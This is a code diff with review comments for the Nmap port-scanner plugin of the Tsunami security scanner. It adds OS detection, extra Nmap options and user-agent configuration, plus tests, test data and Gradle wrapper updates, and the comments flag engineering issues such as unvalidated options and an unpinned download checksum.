%JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal 
diff --git a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScanner.java b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScanner.java index 32a6c29c8..f6ee5c55b 100644 --- a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScanner.java +++ b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScanner.java @@ -27,6 +27,7 @@ import com.google.tsunami.common.command.CommandExecutionThreadPool; import com.google.tsunami.common.data.NetworkEndpointUtils; import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClientCliOptions; import com.google.tsunami.plugin.PluginType; import com.google.tsunami.plugin.PortScanner; import com.google.tsunami.plugin.annotations.PluginInfo; @@ -39,12 +40,14 @@ import com.google.tsunami.plugins.portscan.nmap.client.result.Host; import com.google.tsunami.plugins.portscan.nmap.client.result.Hostname; import com.google.tsunami.plugins.portscan.nmap.client.result.NmapRun; +import com.google.tsunami.plugins.portscan.nmap.client.result.OsClass; import com.google.tsunami.plugins.portscan.nmap.client.result.Port; import com.google.tsunami.plugins.portscan.nmap.client.result.Ports; import com.google.tsunami.plugins.portscan.nmap.client.result.Script; import com.google.tsunami.plugins.portscan.nmap.option.NmapPortScannerCliOptions; import com.google.tsunami.proto.NetworkEndpoint; import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.OperatingSystemClass; import com.google.tsunami.proto.PortScanningReport; import com.google.tsunami.proto.ScanTarget; import com.google.tsunami.proto.ServiceContext; 
@@ -74,11 +77,13 @@ bootstrapModule = NmapPortScannerBootstrapModule.class) public final class NmapPortScanner implements PortScanner { private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final int MAX_NUMBER_OF_OS_GUESSES = 1; private final NmapClient nmapClient; private final Executor commandExecutor; private final NmapPortScannerConfigs configs; private final NmapPortScannerCliOptions cliOptions; + private final HttpClientCliOptions httpClientCliOptions; private ScanTarget scanTarget; @@ -87,11 +92,19 @@ public final class NmapPortScanner implements PortScanner { NmapClient nmapClient, @CommandExecutionThreadPool Executor commandExecutor, NmapPortScannerConfigs configs, - NmapPortScannerCliOptions cliOptions) { + NmapPortScannerCliOptions cliOptions, + HttpClientCliOptions httpClientCliOptions) { this.nmapClient = checkNotNull(nmapClient); this.commandExecutor = checkNotNull(commandExecutor); this.configs = checkNotNull(configs); this.cliOptions = checkNotNull(cliOptions); + this.httpClientCliOptions = checkNotNull(httpClientCliOptions); + } + + private static boolean isRunningInPrivilegedMode() { + // TODO(b/353644363): implement proper heuristics for this. For now, autodetection is just + // turned off. + return false; } @Override 
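Review bot: `isRunningInPrivilegedMode()` is a stub that always returns false, so as far as this diff shows the only way `scan` reaches `asPrivileged()` is the `--nmap-os-detection` flag, and nothing checks that the process actually holds the privileges Nmap needs for OS detection. Until the TODO is resolved the method should say so, for example `/** Always false for now: privileged mode is only enabled by --nmap-os-detection, and the operator must ensure the process may run Nmap privileged. */`. The TODO also cites an internal bug id that outside readers cannot open, so a short description of the intended heuristic would help.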
@@ -100,20 +113,29 @@ public PortScanningReport scan(ScanTarget scanTarget) { try { logger.atInfo().log("Starting nmap scan."); Stopwatch stopwatch = Stopwatch.createStarted(); - NmapRun result = - setPortTargets(nmapClient) - .withDnsResolution(DnsResolution.NEVER) - .treatAllHostsAsOnline() - .withScanTechnique(ScanTechnique.CONNECT) - .asUnprivileged() - .withServiceAndVersionDetection() - .withVersionDetectionIntensity(5) - .withScript("banner") - .withScript("ssl-enum-ciphers") - .withScript("http-methods", "http.useragent=TsunamiSecurityScanner") - .withTimingTemplate(TimingTemplate.AGGRESSIVE) - .withTargetNetworkEndpoint(scanTarget.getNetworkEndpoint()) - .run(commandExecutor); + setPortTargets(nmapClient) + .withDnsResolution(DnsResolution.NEVER) + .treatAllHostsAsOnline() + .withScanTechnique(ScanTechnique.CONNECT) + .withServiceAndVersionDetection() + .withVersionDetectionIntensity(5) + .withScript("banner") + .withScript("ssl-enum-ciphers") + .withScript("http-methods", "http.useragent=" + httpClientCliOptions.userAgent) + .withTimingTemplate(TimingTemplate.AGGRESSIVE) + .withTargetNetworkEndpoint(scanTarget.getNetworkEndpoint()) + .withExtraCommandLineOptions(cliOptions.nmapCmdOpts); + + if (isRunningInPrivilegedMode() || cliOptions.nmapOsDetection) { + // According to https://nmap.org/book/osdetect-methods.html, OS fingerprinting sends + // up to 16 packets altogether, so it should not increase the scan time. + // Also, OS detection requires privileged mode, so we don't set the unprivileged flag. + nmapClient.withOsDetection().asPrivileged(); + } else { + nmapClient.asUnprivileged(); + } + + NmapRun result = nmapClient.run(commandExecutor); logger.atInfo().log( "Finished nmap scan on target '%s' in %s.", loggableScanTarget(scanTarget), stopwatch.stop()); 
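Review bot: The `http-methods` script argument is now built as `"http.useragent=" + httpClientCliOptions.userAgent`, and `NmapClient` joins script arguments with commas (the client test in this commit expects `a,b`), so a user agent containing a comma would be split into separate script arguments. Common browser strings contain one, as in `(KHTML, like Gecko)`. The value should be quoted for Nmap's script-args syntax and rejected if it contains a double quote itself, e.g. `checkArgument(!ua.contains("\""));` followed by `.withScript("http-methods", "http.useragent=\"" + ua + "\"")`. If the option has no default, a null `userAgent` would also be sent as the literal text `null`; the options class is not visible here, so that needs confirming.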
@@ -210,14 +232,51 @@ private PortScanningReport extractServicesFromNmapRun(NmapRun nmapRun) { } private TargetInfo buildTargetInfoFromNmaprun(NmapRun nmapRun) { - return TargetInfo.newBuilder() - .addNetworkEndpoints( - getHostFromNmapRun(nmapRun) - .map(this::buildNetworkEndpointFromHost) - .orElse(scanTarget.getNetworkEndpoint())) + var nmapHost = getHostFromNmapRun(nmapRun); + var infoBuilder = + TargetInfo.newBuilder() + .addNetworkEndpoints( + nmapHost + .map(this::buildNetworkEndpointFromHost) + .orElse(scanTarget.getNetworkEndpoint())); + var oses = buildOperatingSystemClassesFromHost(nmapHost); + if (!oses.isEmpty()) { + infoBuilder.addAllOperatingSystemClasses(oses); + } + return infoBuilder.build(); + } + + private static OperatingSystemClass convertOperatingSystemClassFromXml(OsClass osc) { + int accuracy = 0; + try { + accuracy = Integer.parseInt(osc.accuracy()); + } catch (NumberFormatException e) { + logger.atWarning().withCause(e).log("Invalid accuracy value: %s", osc.accuracy()); + } + return OperatingSystemClass.newBuilder() + .setType(osc.type()) + .setVendor(osc.vendor()) + .setOsFamily(osc.osFamily()) + .setOsGeneration(osc.osGen()) + .setAccuracy(accuracy) .build(); } + private ImmutableList buildOperatingSystemClassesFromHost( + Optional host) { + if (host.isEmpty()) { + return ImmutableList.of(); + } + return host.get().oses().stream() + .flatMap(os -> os.osMatches().stream()) + .flatMap(osm -> osm.osClasses().stream()) + // Note: we do not order the OSes by accuracy, because Nmap populates the list starting with + // the "perfect" matches: https://github.com/nmap/nmap/blob/master/output.cc#L1896 + .limit(MAX_NUMBER_OF_OS_GUESSES) + .map(NmapPortScanner::convertOperatingSystemClassFromXml) + .collect(toImmutableList()); + } + private NetworkEndpoint buildNetworkEndpointFromHost(Host host) { Optional
address = getAddressFromHost(host); Optional hostname = getHostnameFromHost(host); diff --git a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClient.java b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClient.java index 6c006ab5f..1fc9dd2d5 100644 --- a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClient.java +++ b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClient.java @@ -21,6 +21,7 @@ import com.google.common.annotations.VisibleForTesting; import com.google.common.collect.ImmutableList; +import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.tsunami.common.command.CommandExecutor; import com.google.tsunami.common.command.CommandExecutorFactory; import com.google.tsunami.common.data.NetworkEndpointUtils; @@ -191,6 +192,7 @@ Optional getFlag() { } private final String nmapBinaryPath; + private final List extraCommandArgs = new ArrayList<>(); private final List networkEndpoints = new ArrayList<>(); private final List hostDiscoveryTechniques = new ArrayList<>(); private final List dnsServers = new ArrayList<>(); @@ -321,6 +323,10 @@ ArrayList buildRunCommandArgs() { runCommandArgs.add("-6"); } + if (extraCommandArgs != null) { + runCommandArgs.addAll(extraCommandArgs); + } + networkEndpoints.stream() .map(NmapClient::networkEndpointToCliRepresentation) .forEach(runCommandArgs::add); 
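Review bot: In `convertOperatingSystemClassFromXml` the `accuracy` attribute from the Nmap XML is only guarded against `NumberFormatException`, so a value outside 0–100 is stored unchanged and an unparsable one becomes 0, which a consumer cannot tell apart from a genuine zero-confidence guess. I would clamp the parsed value, `accuracy = Math.max(0, Math.min(100, Integer.parseInt(osc.accuracy())));`, and either skip the entry on a parse failure or document that 0 also means "unknown". `buildOperatingSystemClassesFromHost` also takes an `Optional` parameter only to unwrap it; `nmapHost.map(...).orElse(ImmutableList.of())` at the call site would let it take a plain `Host`.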
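Review bot: The `if (extraCommandArgs != null)` guard added to `buildRunCommandArgs` can never be false, because the field is declared `final` and initialised to `new ArrayList<>()` in the hunk just above. The block can be reduced to `runCommandArgs.addAll(extraCommandArgs);`. `buildRunCommandArgs` starts and ends outside this hunk, so the exact position of the extra options relative to the other flags is only known from the new test.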
@@ -354,6 +360,20 @@ public NmapClient withTargetNetworkEndpoint(NetworkEndpoint networkEndpoint) { return this; } + /** + * Sets additional command line options for the Nmap scanning. They are appended at the end of + * nmap command invocation, right before the targets. + * + * @param commandArgs The extra command line options. + */ + @CanIgnoreReturnValue + public NmapClient withExtraCommandLineOptions(List commandArgs) { + if (commandArgs != null) { + this.extraCommandArgs.addAll(commandArgs); + } + return this; + } + /** * Skips the host discovery stage, this causes nmap to perform scanning even if the host is dead. * This method is incompatible with {@link diff --git a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/option/NmapPortScannerCliOptions.java b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/option/NmapPortScannerCliOptions.java index ba90e7682..d52f893d3 100644 --- a/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/option/NmapPortScannerCliOptions.java +++ b/google/portscan/nmap/src/main/java/com/google/tsunami/plugins/portscan/nmap/option/NmapPortScannerCliOptions.java @@ -38,6 +38,14 @@ public final class NmapPortScannerCliOptions implements CliOption { // Splitting and conversion is done by the NmapPortScanner itself. public String portRangesTarget; + @Parameter( + names = "--nmap-cmd-opts", + description = "Additional command line options for Nmap scanning.") + public List nmapCmdOpts; + + @Parameter(names = "--nmap-os-detection", description = "Activates OS detection in Nmap.") + public boolean nmapOsDetection; + @Override public void validate() {} } diff --git a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScannerTest.java b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScannerTest.java index 8b09de44c..48cb39743 100644 
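Review bot: `withExtraCommandLineOptions` copies the operator-supplied list into the Nmap argument vector unchecked, and the `validate()` visible in the `NmapPortScannerCliOptions` hunk that follows is still empty. `--nmap-cmd-opts` can therefore carry options that conflict with what the client sets itself: a second `-oX`, a different `--script`, or a bare word that Nmap would read as an extra target beside the `ScanTarget`. If the scanner's command line is ever assembled from less trusted input, this becomes argument injection into an Nmap run that may be privileged. I would reject output, target and script options in `validate()` and state it in the Javadoc and the parameter text, e.g. `description = "Additional Nmap options, passed verbatim; output, target and script options are rejected."`.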
--- a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScannerTest.java +++ b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/NmapPortScannerTest.java @@ -35,6 +35,7 @@ import com.google.tsunami.plugins.portscan.nmap.option.NmapPortScannerCliOptions; import com.google.tsunami.proto.NetworkEndpoint; import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.OperatingSystemClass; import com.google.tsunami.proto.PortScanningReport; import com.google.tsunami.proto.ScanTarget; import com.google.tsunami.proto.Software; @@ -99,7 +100,16 @@ public void run_whenNmapRunHasOpenPorts_returnsMatchingService() throws Exceptio portScanner.scan(ScanTarget.newBuilder().setNetworkEndpoint(networkEndpoint).build())) .isEqualTo( PortScanningReport.newBuilder() - .setTargetInfo(TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint)) + .setTargetInfo( + TargetInfo.newBuilder() + .addNetworkEndpoints(networkEndpoint) + .addOperatingSystemClasses( + OperatingSystemClass.newBuilder() + .setType("WAP") + .setVendor("Asus") + .setOsFamily("embedded") + .setAccuracy(98) + .build())) .addNetworkServices( NetworkService.newBuilder() .setNetworkEndpoint( diff --git a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClientTest.java b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClientTest.java index 1dd273884..1dda2936d 100644 --- a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClientTest.java +++ b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/NmapClientTest.java 
@@ -22,6 +22,7 @@ import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; +import com.google.common.collect.ImmutableList; import com.google.tsunami.common.command.CommandExecutor; import com.google.tsunami.common.command.CommandExecutorFactory; import com.google.tsunami.common.data.NetworkEndpointUtils; @@ -353,6 +354,32 @@ public void buildRunCommandArgs_withMultipleScript_returnsCorrectCommandLine() { report.getAbsolutePath()); } + @Test + public void buildRunCommandArgs_withExtraCommandLineArgs_returnsCorrectCommandLine() { + client + .withTargetNetworkEndpoint(NetworkEndpointUtils.forIp("1.1.1.1")) + .withExtraCommandLineOptions(ImmutableList.of("--foo", "--bar")) + .withScript("test1", "a", "b") + .withScript("test2", "e", "f"); + + assertThat(client.buildRunCommandArgs()) + .containsExactly( + nmapFile.getAbsolutePath(), + "--script", + "test1", + "--script-args", + "a,b", + "--script", + "test2", + "--script-args", + "e,f", + "--foo", + "--bar", + "1.1.1.1", + "-oX", + report.getAbsolutePath()); + } + @Test public void getResults_onceClientHasRan_returnsNmapRunReport() throws IOException, ExecutionException, InterruptedException, ParserConfigurationException, diff --git a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/parser/NmapResultHandlerTest.java b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/parser/NmapResultHandlerTest.java index 561b291d0..6c219c228 100644 --- a/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/parser/NmapResultHandlerTest.java +++ b/google/portscan/nmap/src/test/java/com/google/tsunami/plugins/portscan/nmap/client/parser/NmapResultHandlerTest.java 
@@ -423,4 +423,367 @@ public void parse_always_buildsNmapRunFromXmlDocument() throws IOException, SAXE .build()) .build()); } + + @Test + public void parse_multipleOsMatch_buildsNmapRunFromXmlDocument() + throws IOException, SAXException { + InputStream resource = + getClass().getResourceAsStream("testdata/scanRunIPv6_multipleOsMatch.xml"); + NmapResultHandler nmapResultHandler = new NmapResultHandler(); + + parser.parse(resource, nmapResultHandler); + + assertThat(nmapResultHandler.getNmapRun()) + .isEqualTo( + NmapRun.builder() + .setScanner("nmap") + .setArgs( + "nmap -n -sS -Pn -O --version-intensity 9 -sC -sV -6 -oX /tmp/ipv6.xml" + + " 2001:4860:4860::8888") + .setStart("1573478646") + .setStartStr("Mon Nov 11 14:24:06 2019") + .setVersion("7.70") + .setProfileName("") + .setXmlOutputVersion("1.04") + .setVerbose(Verbose.builder().setLevel("0").build()) + .setDebugging(Debugging.builder().setLevel("0").build()) + .addValueElement( + Target.builder() + .setSpecification("test specification") + .setStatus("skipped") + .setReason("invalid") + .build()) + .addValueElement( + TaskBegin.builder() + .setTask("test task") + .setTime("123456789") + .setExtraInfo("test extrainfo") + .build()) + .addValueElement( + TaskProgress.builder() + .setTask("test task") + .setTime("123456789") + .setPercent("90") + .setRemaining("10") + .setEtc("123") + .build()) + .addValueElement( + TaskEnd.builder() + .setTask("test task") + .setTime("123456789") + .setExtraInfo("test extrainfo") + .build()) + .addValueElement( + PreScript.builder() + .addScript( + Script.builder() + .setId("test prescript script1 id") + .setOutput("test prescript script1 output") + .addValueElement( + Elem.builder() + .setKey("test prescript script1 elem key") + .setValue( + "\n test prescript script1 elem value\n ") + .build()) + .addValueElement("\n \n ") + .build()) + .addScript( + Script.builder() + .setId("test prescript script2 id") + .setOutput("test prescript script2 output") + .addValueElement( + 
Elem.builder() + .setKey("test prescript script2 elem1 key") + .setValue( + "\n test prescript script2 elem1 value\n ") + .build()) + .addValueElement( + Elem.builder() + .setKey("test prescript script2 elem2 key") + .setValue( + "\n test prescript script2 elem2 value\n ") + .build()) + .addValueElement("\n \n \n ") + .build()) + .build()) + .addValueElement( + PostScript.builder() + .addScript( + Script.builder() + .setId("test postscript script id") + .setOutput("test postscript script output") + .addValueElement( + Table.builder() + .setKey("test postscript table key") + .addValueElement( + Elem.builder() + .setKey("test postscript table elem key") + .setValue( + "\n" + + " test postscript table elem" + + " value\n" + + " ") + .build()) + .build()) + .addValueElement( + Table.builder() + .setKey("test postscript nest outer table key") + .addValueElement( + Table.builder() + .setKey("test postscript nest inner table key") + .addValueElement( + Elem.builder() + .setKey( + "test postscript nest table elem key") + .setValue( + "\n" + + " test postscript" + + " table elem value\n" + + " ") + .build()) + .build()) + .build()) + .addValueElement("\n \n \n ") + .build()) + .build()) + .addValueElement( + Host.builder() + .setStartTime("1573478646") + .setEndTime("1573478879") + .setComment("host comment") + .addValueElement( + Status.builder() + .setState("up") + .setReason("user-set") + .setReasonTtl("0") + .build()) + .addValueElement( + Address.builder() + .setAddr("2001:4860:4860::8888") + .setAddrType("ipv6") + .setVendor("") + .build()) + .addValueElement( + Hostnames.builder() + .addHostname( + Hostname.builder().setName("hostname").setType("user").build()) + .addHostname( + Hostname.builder().setName("hostname2").setType("PTR").build()) + .build()) + .addValueElement(Smurf.builder().setResponses("responses").build()) + .addValueElement( + Ports.builder() + .addExtraPorts( + ExtraPorts.builder() + .setState("filtered") + .setCount("998") + .addExtraReasons( + 
ExtraReasons.builder() + .setReason("no-responses") + .setCount("996") + .build()) + .addExtraReasons( + ExtraReasons.builder() + .setReason("admin-prohibiteds") + .setCount("2") + .build()) + .build()) + .addPort( + Port.builder() + .setProtocol("tcp") + .setPortId("53") + .setState( + State.builder() + .setState("open") + .setReason("syn-ack") + .setReasonTtl("120") + .setReasonIp("") + .build()) + .setService( + Service.builder() + .setName("tcpwrapped") + .setConf("8") + .setMethod("probed") + .setVersion("") + .setProduct("") + .setExtraInfo("") + .setTunnel("") + .setProto("") + .setRpcNum("") + .setLowVer("") + .setHighVer("") + .setHostname("") + .setOsType("") + .setDeviceType("") + .setServiceFp("") + .build()) + .build()) + .addPort( + Port.builder() + .setProtocol("tcp") + .setPortId("443") + .setState( + State.builder() + .setState("open") + .setReason("syn-ack") + .setReasonTtl("120") + .setReasonIp("") + .build()) + .setService( + Service.builder() + .setName("https") + .setConf("10") + .setMethod("probed") + .setVersion("") + .setProduct("sffe") + .setExtraInfo("") + .setTunnel("ssl") + .setProto("") + .setRpcNum("") + .setLowVer("") + .setHighVer("") + .setHostname("") + .setOsType("") + .setDeviceType("") + .setServiceFp("servicefp") + .build()) + .addScript( + Script.builder() + .setId("http-title") + .setOutput("Error 400 (Bad Request)!!1") + .addValueElement( + Elem.builder() + .setKey("title") + .setValue("Error 400 (Bad Request)!!1") + .build()) + .addValueElement("\n \n ") + .build()) + .build()) + .build()) + .addValueElement( + Os.builder() + .addPortUsed( + PortUsed.builder() + .setState("open") + .setProto("tcp") + .setPortId("53") + .build()) + .addOsMatch( + OsMatch.builder() + .setName("name") + .setAccuracy("accuracy") + .setLine("line") + .addOsClass( + OsClass.builder() + .setVendor("vendor0") + .setOsGen("osgen0") + .setType("type0") + .setAccuracy("accuracy0") + .setOsFamily("osfamily0") + 
.addCpe(Cpe.builder().setValue("cpe0").build()) + .build()) + .addOsClass( + OsClass.builder() + .setVendor("vendor1") + .setOsGen("osgen1") + .setType("type1") + .setAccuracy("accuracy1") + .setOsFamily("osfamily1") + .addCpe(Cpe.builder().setValue("cpe1").build()) + .build()) + .build()) + .addOsMatch( + OsMatch.builder() + .setName("Linux 2.6.32") + .setAccuracy("96") + .setLine("55742") + .addOsClass( + OsClass.builder() + .setVendor("Linux") + .setOsGen("2.6.X") + .setType("general purpose") + .setAccuracy("96") + .setOsFamily("Linux") + .addCpe( + Cpe.builder() + .setValue( + "cpe:/o:linux:linux_kernel:2.6.32") + .build()) + .build()) + .build()) + .addOsFingerprint( + OsFingerprint.builder().setFingerprint("fingerprint").build()) + .build()) + .addValueElement(Distance.builder().setValue("distance value").build()) + .addValueElement(Uptime.builder().setSeconds("1").setLastBoot("2").build()) + .addValueElement( + TcpSequence.builder() + .setIndex("0") + .setDifficulty("difficulty") + .setValues("values") + .build()) + .addValueElement( + IpIdSequence.builder().setClazz("class").setValues("values").build()) + .addValueElement( + TcpTsSequence.builder().setClazz("class").setValues("values").build()) + .addValueElement( + HostScript.builder() + .addScript( + Script.builder() + .setId("hostscript script id") + .setOutput("hostscript script output") + .addValueElement( + Elem.builder() + .setKey("hostscript script elem key") + .setValue("elem value") + .build()) + .addValueElement("\n \n ") + .build()) + .build()) + .addValueElement( + Trace.builder() + .setProto("proto") + .setPort("port") + .addHop( + Hop.builder() + .setTtl("ttl") + .setRtt("rtt") + .setIpAddr("ipaddr") + .setHost("host") + .build()) + .build()) + .addValueElement( + Times.builder() + .setSrtt("1112") + .setRttVar("450") + .setTo("100000") + .build()) + .build()) + .addValueElement( + Output.builder().setType("test output type").setValue("output value").build()) + .setRunStats( + 
RunStats.builder() + .setFinished( + Finished.builder() + .setTime("1573478879") + .setTimeStr("Mon Nov 11 14:27:59 2019") + .setElapsed("232.81") + .setSummary( + "Nmap done at Mon Nov 11 14:27:59 2019; 1 IP address (1 host" + + " up) scanned in 232.81 seconds") + .setExit("success") + .setErrorMsg("") + .build()) + .setHosts(Hosts.builder().setUp("1").setDown("0").setTotal("1").build()) + .build()) + .addScanInfo( + ScanInfo.builder() + .setType("syn") + .setScanFlags("") + .setProtocol("tcp") + .setNumServices("1000") + .setServices("1,2,3,80,2725") + .build()) + .build()); + } } diff --git a/google/portscan/nmap/src/test/resources/com/google/tsunami/plugins/portscan/nmap/client/parser/testdata/scanRunIPv6_multipleOsMatch.xml b/google/portscan/nmap/src/test/resources/com/google/tsunami/plugins/portscan/nmap/client/parser/testdata/scanRunIPv6_multipleOsMatch.xml new file mode 100644 index 000000000..7c16c162d --- /dev/null +++ b/google/portscan/nmap/src/test/resources/com/google/tsunami/plugins/portscan/nmap/client/parser/testdata/scanRunIPv6_multipleOsMatch.xml @@ -0,0 +1,114 @@ + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + cpe0 + + + cpe1 + + + + cpe:/o:linux:linux_kernel:2.6.32 + + + + + + + + + + + + + + + + + output value + + + + + diff --git a/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.jar b/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.jar and b/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.jar differ diff --git a/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.properties b/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.properties +++ b/govtech/detectors/cves/cve_2020_3452/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/govtech/detectors/cves/cve_2020_3452/gradlew b/govtech/detectors/cves/cve_2020_3452/gradlew index fbd7c5158..1aa94a426 100755 --- a/govtech/detectors/cves/cve_2020_3452/gradlew +++ b/govtech/detectors/cves/cve_2020_3452/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
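Review bot: The `gradle-wrapper.properties` hunk moves the wrapper to `gradle-7.0-bin.zip` and adds `validateDistributionUrl=true`, but the download is still not pinned to a checksum, so the wrapper will run whatever archive that URL serves. I would add `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip as published by Gradle>` here and in any other wrapper property file this commit touches. The `gradle-wrapper.jar` replaced alongside it is a binary the diff cannot show, so it should be verified against Gradle's published wrapper checksums before merging.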
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
